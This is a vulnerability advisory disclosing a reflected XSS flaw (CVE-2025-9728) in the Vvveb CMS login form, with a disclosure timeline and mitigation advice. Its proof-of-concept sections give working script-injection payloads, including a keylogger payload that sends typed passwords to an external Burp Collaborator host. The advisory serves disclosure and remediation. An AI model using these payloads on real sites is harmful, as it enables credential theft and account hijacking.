# Reflected XSS in Login Form (Email & Password Fields) Vvveb CMS v1.0.7.2

- **Author:** Andrew Paul
- **Date of Discovery:** August 12th, 2025
- **Vendor:** Vvveb
- **Vendor URL:** http://vvveb.com
- **Vendor GitHub:** https://github.com/givanz/Vvveb
- **Affected Version:** 1.0.7.2 (and likely prior versions)
- **CVE ID:** [CVE-2025-9728](https://nvd.nist.gov/vuln/detail/CVE-2025-9728)

## Summary

A Reflected Cross-Site Scripting (XSS) vulnerability ([CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')](https://cwe.mitre.org/data/definitions/79.html)) exists in the user login form. The `email` and `password` parameters are not sanitized before being reflected in the HTML response. This allows an attacker to inject malicious scripts by crafting a special URL, leading to credential theft via a keylogger payload. This was confirmed by exfiltrating password data to a Burp Collaborator server.

## OWASP Top 10 2021 Mapping

This vulnerability maps to several categories in the OWASP Top 10 2021:

- [**A03:2021 - Injection:**](https://owasp.org/Top10/A03_2021-Injection/) The application is vulnerable to injection because it includes untrusted data in the HTML page sent to the browser without proper sanitization, allowing an attacker's script to be executed.

- [**A04:2021 - Insecure Design:**](https://owasp.org/Top10/A04_2021-Insecure_Design/) The login mechanism is insecure by design because it lacks a fundamental security control: server-side output encoding for user-reflective content.

- [**A05:2021 - Security Misconfiguration:**](https://owasp.org/Top10/A05_2021-Security_Misconfiguration/) The application improperly relies on weak client-side controls like `<input type="email">`, which provide no real security as they can be trivially bypassed by an attacker.

## Vulnerability Details

The root cause of this vulnerability is the server's failure to perform output encoding on user-supplied data. When a user submits the login form, the values provided for the `email` and password fields are re-inserted into the `value` attribute of the corresponding `<input>` tags on the resulting page load. By providing a payload that includes a double quote ("), an attacker can break out of the `value` attribute and inject new HTML attributes (e.g., `onkeyup`) or entirely new tags (e.g., `<script>`). This behavior was confirmed for both the `email` and `password` fields.

## Potential Attack Vectors

This vulnerability can be exploited through any vector that allows an attacker to trick a victim into submitting a crafted request to the server. The most common vector is a phishing attack, where an attacker crafts a malicious URL containing the XSS payload and sends it to a victim. When the victim clicks the link, the payload executes in their browser.

## Proof of Concept (PoC)

The vulnerability is demonstrated through two distinct proofs of concept: a simple script injection that triggers a visual alert, and a more advanced attack that captures user credentials. The images provided serve as direct evidence for these PoCs.

### PoC A: Simple Alert Verification

This PoC confirms basic script execution in both vulnerable fields.

#### Payloads

- **Email:**  `j4u6e"><script>alert('email')</script>ou1w`
- **Password:**  `j4u6e"><script>alert('password')</script>ou1w`

#### Steps to Reproduce

1. Navigate to the login page at `http(s)://example.com/user/login`.
2. Enter one of the payloads into its corresponding input field.
3. Submit the form.

#### Result
A JavaScript `alert()` box appears on the screen, confirming the vulnerability.

![](/assets/477242430-ac525a5b-02c2-4796-9091-f286c32dfe13.png)
_Payload in input fields_

![](/assets/477243474-d29a10e3-afbb-4e4d-8ea6-17225198f369.png)
_Email alert_

![](/assets/477243794-cc19ddea-b8fe-48e0-86c5-383fc9f57bd0.png)
_Password alert_

### PoC B: Credential Theft via Keylogger
This PoC demonstrates the critical impact by stealing password keystrokes.

#### Payload
`j4u6e" onkeyup="fetch('https://hg1n99wu463z4ujvj808u3f3ruxnlg95.oastify.com?data=' + btoa(this.value))"`

#### Steps to Reproduce
1. Navigate to the login page at `http(s)://example.com/user/login`.
2. Paste the keylogger payload directly into the `password` input field. 
3. Type a fake password into the compromised field.

#### Result
Each keystroke is captured and sent to the attacker's Burp Collaborator server. This confirms that arbitrary scripts can be executed and can exfiltrate sensitive data.

![](/assets/477244333-4b7497b5-e11f-46be-9bae-4ef8ec5c95d5.png)
_Compromised input_

![](/assets/477244861-9eca51f2-9f79-474b-bc2e-4e472d976f19.png)
_Password sent to Burp Suite Collaborator_

![](/assets/477244938-2185c3b0-bfea-46bd-84a7-7a3ec4b84fa4.png)
_Vulnerable code with payload_

## Impact
A successful exploit of this vulnerability can lead to a full compromise of the user's account and browser session. The primary impacts include:

- **Credential Theft:** An attacker can steal usernames and passwords in real-time, as demonstrated in the PoC.
- **Session Hijacking:** An attacker can use injected scripts to steal the user's session cookie after they log in, allowing them to completely impersonate the user.
- **Website Defacement and Phishing:** The attacker can alter the content of the login page to phish for more sensitive information or to damage the brand's reputation.
- **Further Attacks:** The vulnerability can be used to launch further attacks against the user's browser or to redirect them to malicious websites.


## Recommended Mitigation
The best practice is to use a **defense-in-depth** approach, combining input validation with proper output encoding.

### Input Validation (First Layer)
 As a good security practice, the server should perform **input validation** to reject requests that contain obviously malicious patterns. This provides an initial layer of defense but should not be relied upon as the only fix.

### Output Encoding (Essential Fix)
 The primary and most critical fix is to apply **output encoding** to all user-supplied data just before it is rendered in the HTML. The `htmlspecialchars()` function can be used.

## Disclosure Timeline
- **Discovery Date:** August 12th, 2025
- **Vendor Notification Date:** August 12th, 2025
- **Vendor Acknowledgment Date:** August 12th, 2025
- **Patch Release Date:** [August 12th, 2025](https://github.com/givanz/Vvveb/commit/bbd4c42c66ab818142240348173a669d1d2537fe)
- **Public Disclosure Date:** August 22nd, 2025
